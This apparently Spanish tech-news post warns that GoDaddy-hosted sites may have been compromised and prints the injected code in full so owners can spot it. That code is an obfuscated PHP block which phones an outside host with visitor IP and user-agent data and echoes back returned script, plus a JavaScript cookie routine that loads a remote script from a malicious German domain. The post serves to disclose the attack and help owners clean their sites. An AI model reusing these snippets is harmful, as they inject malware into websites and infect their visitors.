GoDaddy inicialmente es conocida por ofrecer registro de dominios de Internet y alojamiento web a un gran número de clientes de pequeñas empresas que disfrutan de sus servicios y precios. Aunque han tenido algún problema, suelen funcionar bastante bien como housing de páginas web.
Hoy nos llega información que algunos de sus servidores han podido ser hackeados. Si tienes una web alojada en este proveedor de servicios de Interne,t revisa tus archivos PHP y tus archivos JS para ver que no han sido modificados en el servidor y sino arreglarlos por tu FTP.
Pare ser que te meten un enlace a una Web maliciosa finan zzentrum-wuermtal
Estos son los códigos. Si es tu caso limpia los archivos y ponte en contacto con GoDaddy para avisarles para que revisen ese servidor.
<?php
#9dcc9d#
error_reporting(0); ini_set(‘display_errors’,0); $wp_fs0 = @$_SERVER[‘HTTP_USER_AGENT’];
if (( preg_match (‘/Gecko|MSIE/i’, $wp_fs0) && !preg_match (‘/bot/i’, $wp_fs0))){
$wp_fs090=»http://».»template».»class».».com/class».»/?ip=».$_SERVER[‘REMOTE_ADDR’].»&referer=».urlencode($_SERVER[‘HTTP_HOST’]).»&ua=».urlencode($wp_fs0);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_fs090);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_0fs = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_0fs,1,3) === ‘scr’ ){ echo $wp_0fs; }
#/9dcc9d#
?>
/*a366c2*/
function getCookie(name) { var cookie = » » + document.cookie; var search = » » + name + «=»; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(«;», offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;}
if (navigator.userAgent.indexOf(«MSIE») != -1){if(navigator.cookieEnabled == true) {var user0 = getCookie(«cscs09″);if (user0 !==»cscs»){setCookie(«cscs09», «cscs», 7, «/»); cookiecs09cs();}}} function cookiecs09cs(){document.write(«<script src=’http:// www.finanzzentrum-wuermtal.de/cgi-bin/9hWx7YJ8.php?id=140129855′ type=’text/javascript’></» + «script>»);}
function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + «=» + escape(value) + ((expiredays) ? «; expires=» + expires : «») + ((path) ? «; path=» + path : «») + ((domain) ? «; domain=» + domain : «») + ((secure) ? «; secure» : «»);}
/*/a366c2*/
. Leer artículo completo en Frikipandi Posible ataque en GoDaddy.